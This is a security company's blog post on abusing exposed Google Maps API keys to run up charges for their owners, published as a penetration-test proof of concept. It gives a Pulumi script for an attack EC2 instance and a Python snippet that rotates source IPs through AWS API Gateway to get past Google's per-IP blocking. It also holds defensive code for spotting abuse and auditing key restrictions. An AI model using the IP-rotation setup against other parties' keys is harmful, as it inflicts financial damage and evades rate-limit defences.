How To Increase the Impact of An Exposed Google Maps API Key Issue

Too many organizations are risking their financial stability by not implementing proper security boundaries when using the Google Maps API Key. If you're in charge of an app that needs access to this service, be sure you have configured it properly and placed appropriate security controls to prevent external abuse.

Syn Cubes Team - March 24, 2022

Word Ahead

The Google Maps Platform is a paid service that lets applications embed maps and run searches against the Google Maps database. To consume those Google services, an organization needs an API key (the GMAPS API key).

The standard price of using the Google API key for Static Maps services is $2 per one thousand requests. Other services have a higher price, as shown in the following visual example taken from Google's official website.

Google Maps API Key Usage Pricing

This API key is public and easily discoverable by any Internet user. It also commonly carries insecure configuration, such as overly permissive usage rights. As with the other services consumed in the cloud, it is the organization's technical team's role to be aware of the defaults, assess them, and tweak them based on the organization's current needs.

Unfortunately, that is not the case in most situations. Although there is no impact on customer data confidentiality or integrity, the keys are overly permissive and lack proper security boundaries. Google does not consider this a bug, but rather a misconfiguration of the service on the user's side.

The Vulnerability

Ozgur Alp, a Turkish cybersecurity researcher, first discovered the vulnerability and published it along with open-source scanner code. However, almost two years after the details of this finding were initially released, we consider it to be still underrated.

Proof-Of-Concept

To add more value to the final penetration test results, we developed an add-on concept that can be easily integrated into the detection and attack flow. We went beyond a simple 'vulnerable / not vulnerable' confirmation of the key and provided the client with a proof of concept that they can reuse to understand the issue's impact on their own business model.

Attack Scenario

The overall economics of this attack rest on someone's ability to abuse the API key and send millions of requests without getting blocked by Google's backend.

Our original plan was to come up with a reusable PoC scenario and make sure that every client who was affected by this issue could use and understand the attack vector. Because this issue has a financial impact, we felt that the PoC should be tested by the organization's own teams.

It is worth mentioning that Google's API service backend detects and blocks any short-lived API key abuse firsthand. The whole defense works based on the source IP address, meaning that using a large pool of source IP addresses will bypass this primary line of defense.

And here is where AWS gets helpful, because the API Gateway will automatically rotate the source IP address for us, so every request will come from a different source IP address.

So, we decided to use two basic AWS features: an EC2 instance behind an AWS API Gateway. The concept of using this setup to get around IP restrictions is not new, and it has been well documented by others (check the References section). There is no novel exploit here, just a workaround often used to defeat rate limit defenses.

And finally, before jumping into the technical side of things, here's the “complex” high-level design architecture of this idea.

Attacking GMAPS API Key - A High-level Overview

Proof-of-Concept

All three big cloud providers now allow you to use Infrastructure as Code to deploy and reuse custom architecture. Although some might prefer Terraform, we decided to use the Pulumi tool for infrastructure as code instead: some people prefer the HashiCorp scripting approach, while others are happier with the Python way, and that is where this option comes in handy.

Prerequisites

1. Install Pulumi: https://www.pulumi.com/docs/get-started/install/

2. Configure AWS credentials: https://www.pulumi.com/docs/intro/cloud-providers/aws/setup/

3. Create a project with (you may have to log in to Pulumi first):

---------------------------------------------------------------------------
pulumi new aws-python --name <project-name>
---------------------------------------------------------------------------


4. Open __main__.py and replace the contents with the ones in this __main__.py

The (Pulumi) Script

---------------------------------------------------------------------------
import pulumi
import pulumi_aws as aws

size = 't2.micro'

# Look up the custom AMI prepared for the demo; 'owners' must be your 12-digit AWS account id
ami = aws.get_ami(most_recent=True,
    owners=["your_aws_account_12_digits_number"],
    filters=[{"name": "name", "values": ["gmaps-api-demo"]}])

# Security group that only allows SSH from your own external IP address
group = aws.ec2.SecurityGroup('maps-secgrp', description='Enable SSH access',
    ingress=[
        {'protocol': 'tcp', 'from_port': 22, 'to_port': 22, 'cidr_blocks': ['your_external_ip/32']}
    ])

server = aws.ec2.Instance('Google-API-Cannon', instance_type=size,
    vpc_security_group_ids=[group.id],  # reference the security group from above
    ami=ami.id)

pulumi.export('publicIp', server.public_ip)
pulumi.export('publicHostName', server.public_dns)
---------------------------------------------------------------------------


5. Run pulumi up to preview and update your infrastructure, then check the AWS account to see the instance.

  • 5.1. Run pulumi destroy to clean up your resources.

  • 5.2. Run pulumi stack rm to delete your stack.

6. SSH into the freshly created EC2 instance and run the following commands:

  • 6.1. git clone the scanner

  • 6.2. python3 -m pip install requests

  • 6.3. python3 -m pip install requests-ip-rotator

  • 6.4. aws configure, so the tool can use the AWS API Gateway

  • 6.5. check whether the GMAPS API key is vulnerable or not:

---------------------------------------------------------------------------
python3 maps_api_scanner_python3.py
---------------------------------------------------------------------------


  • 6.5.1. If the API key is reported vulnerable, then copy the attack vector's direct link details. Under this circumstance, it is a simple GET request towards the Google Maps backend.

  • 6.5.2. For a simpler proof of concept, you can use the requests-ip-rotator Python library.

This is an example of a Python script that uses the AWS API Gateway to send GET requests to a website.

---------------------------------------------------------------------------
import requests
from requests_ip_rotator import ApiGateway

with ApiGateway("target_affected_service_url") as g:
    session = requests.Session()
    session.mount("target_affected_service_url", g)

    # consider the print only if you are interested in logging the result or for debugging purposes
    response = session.get("target_affected_service_url")
    print(response.status_code)
---------------------------------------------------------------------------


Impact

An organization's Google Maps API key can be hijacked and used by someone else, or abused to cause (limited) financial damage.

From what we know, Google's current billing behavior is to send invoices that sum up a total fee including all other services like Google Enterprise CAPTCHA API Key consumption, without providing a breakdown of costs. This could lead to anomalies being easily missed by the procurement department.
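Because Google's own defense keys on the source IP address (as the attack scenario above describes), a client rotating through a large IP pool looks like many small, harmless clients, and the bill is the first place the damage shows. The following is an added example, not code from the original post: it groups request logs by API key rather than by source IP, which exposes the true per-key volume, flags keys whose traffic comes almost entirely from fresh IP addresses (the signature of a rotating-IP client), and converts the volume into an estimated cost at the $2 per thousand Static Maps price quoted above. It assumes the organization can see its Maps traffic with both the key and the caller's IP (for example at a reverse proxy in front of the key, or from the Cloud Console usage metrics when only per-key counts are available); the log format and every log line below are constructed.

```python
"""Per-key abuse detection for Google Maps API traffic (added example).

Log line format assumed here (constructed, not a Google or proxy format):
    <timestamp> <source_ip> <api_key> <path>
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

STATIC_MAPS_USD_PER_1000 = 2.00  # Static Maps price quoted in the post

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def parse_line(line):
    """Return (timestamp, source_ip, api_key, path) or None for a malformed line."""
    match = LINE_RE.match(line.strip())
    return match.groups() if match else None


@dataclass
class KeyStats:
    requests: int = 0
    source_ips: set = field(default_factory=set)

    @property
    def distinct_ips(self):
        return len(self.source_ips)

    @property
    def est_cost_usd(self):
        # What this key's traffic costs at the Static Maps rate.
        return round(self.requests / 1000 * STATIC_MAPS_USD_PER_1000, 4)


def summarize(lines):
    """Aggregate requests and distinct source IPs per API key."""
    stats = defaultdict(KeyStats)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip malformed lines rather than abort the whole run
        _timestamp, source_ip, api_key, _path = parsed
        stats[api_key].requests += 1
        stats[api_key].source_ips.add(source_ip)
    return dict(stats)


def flag_rotating_abuse(stats, min_requests=100, min_ip_ratio=0.5):
    """Keys with high volume where most requests arrive from a never-seen IP.

    Per-IP rate limiting never fires on such traffic; per-key aggregation does.
    """
    flagged = [
        key for key, s in stats.items()
        if s.requests >= min_requests and s.distinct_ips / s.requests >= min_ip_ratio
    ]
    return sorted(flagged)


def build_sample_log():
    """Constructed sample: a normal key plus one hammered from 400 distinct IPs."""
    lines = [
        "2022-03-24T10:00:01Z 203.0.113.10 AIza-NORMAL-KEY /maps/api/staticmap",
        "2022-03-24T10:00:03Z 203.0.113.10 AIza-NORMAL-KEY /maps/api/staticmap",
        "2022-03-24T10:00:05Z 203.0.113.11 AIza-NORMAL-KEY /maps/api/staticmap",
        "garbage line that should be skipped",
    ]
    for i in range(400):
        # 400 different documentation-range addresses, one per request
        ip = f"198.51.100.{i}" if i < 256 else f"192.0.2.{i - 256}"
        lines.append(f"2022-03-24T10:01:{i % 60:02d}Z {ip} AIza-ABUSED-KEY /maps/api/staticmap")
    return lines


if __name__ == "__main__":
    stats = summarize(build_sample_log())
    for key, s in stats.items():
        print(f"{key}: {s.requests} requests, {s.distinct_ips} source IPs, ~${s.est_cost_usd}")
    print("flagged:", flag_rotating_abuse(stats))
```

The thresholds are deliberately simple: a real deployment would compare each key's daily volume against its own baseline and alert when the estimated cost crosses a budget agreed with the business side, which is also the figure worth reconciling against the lump-sum invoice described above.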

Workarounds

- Restrict the API key's feature access to only the ones agreed with the business side.

- Consider contacting Google Support, who acknowledges the issue but has yet to provide clear guidance on how to protect yourself against potential abuse scenarios.

- Last but not least, record this issue in the organization's internal risk assessment registry.
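Restricting the key to the agreed features is a setting that is easy to get right once and then silently lose as the key gets reused by another team, so it is worth auditing continuously. The following is an added example, not code from the original post: it checks a key record against the two restriction classes that matter here, who may present the key (HTTP referrer, source IP, or mobile app restriction) and which Google services it may call, and compares the latter with the list approved by the business side. The field names follow the Google API Keys API v2 Key resource as the author of this example understands it (restrictions.apiTargets, browserKeyRestrictions, serverKeyRestrictions and so on) and should be verified against the live API; the service names and the three key records are constructed.

```python
"""Audit a Google Maps API key's restrictions against the business-approved scope (added example)."""

# Field names as understood from the API Keys API v2 Key resource (assumption; verify).
APPLICATION_RESTRICTION_FIELDS = (
    "browserKeyRestrictions",   # HTTP referrers
    "serverKeyRestrictions",    # source IP addresses
    "androidKeyRestrictions",
    "iosKeyRestrictions",
)

# Services the business side agreed the key may call (assumed service names).
APPROVED_SERVICES = {
    "static-maps-backend.googleapis.com",
    "maps-embed-backend.googleapis.com",
}


def audit_key(key, approved_services=APPROVED_SERVICES):
    """Return a list of findings; an empty list means the key is properly scoped."""
    findings = []
    restrictions = key.get("restrictions") or {}

    # 1. Who may present the key: without any application restriction, the public
    #    key can be used from anywhere, which is the precondition for the abuse above.
    if not any(name in restrictions for name in APPLICATION_RESTRICTION_FIELDS):
        findings.append("no application restriction: any referrer, IP or app can use the key")
    browser = restrictions.get("browserKeyRestrictions") or {}
    if "*" in browser.get("allowedReferrers", []):
        findings.append("browser restriction contains wildcard referrer '*'")

    # 2. What the key may call: with no apiTargets, every enabled API in the
    #    project is callable, not just the Maps services the business pays for.
    targets = restrictions.get("apiTargets") or []
    if not targets:
        findings.append("no API target restriction: every enabled Google API is callable")
    for target in targets:
        service = target.get("service")
        if service not in approved_services:
            findings.append(f"API target {service!r} was not approved by the business")
    return findings


# Constructed key records in the shape described above.
UNRESTRICTED_KEY = {
    "name": "projects/example-project/locations/global/keys/constructed-key-1",
    "displayName": "website-maps",
    "restrictions": {},
}

PROPERLY_SCOPED_KEY = {
    "name": "projects/example-project/locations/global/keys/constructed-key-2",
    "displayName": "website-maps-scoped",
    "restrictions": {
        "browserKeyRestrictions": {"allowedReferrers": ["https://www.example.com/*"]},
        "apiTargets": [
            {"service": "static-maps-backend.googleapis.com"},
            {"service": "maps-embed-backend.googleapis.com"},
        ],
    },
}

OVERBROAD_KEY = {
    "name": "projects/example-project/locations/global/keys/constructed-key-3",
    "displayName": "website-maps-overbroad",
    "restrictions": {
        "browserKeyRestrictions": {"allowedReferrers": ["*"]},
        "apiTargets": [
            {"service": "static-maps-backend.googleapis.com"},
            {"service": "places-backend.googleapis.com"},
        ],
    },
}


if __name__ == "__main__":
    for key in (UNRESTRICTED_KEY, PROPERLY_SCOPED_KEY, OVERBROAD_KEY):
        print(key["displayName"], audit_key(key) or ["OK"])
```

A referrer restriction does not stop a determined caller (the referrer header is client-controlled), so the API target restriction and the usage monitoring are the controls that actually bound the financial exposure; the audit output is a good candidate for the risk assessment registry entry recommended above.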

Acknowledgements | References | Resources




Legal Statement



The information in this blog post is provided for research and educational purposes only. Whilst every effort has been made to ensure that the information contained in this document is true and correct at the time of publication, Syn Cubes, Inc. accepts no liability in any form whatsoever for any direct or indirect damages arising or resulting from the use of or reliance on the information contained herein.

Be the adversary - attack first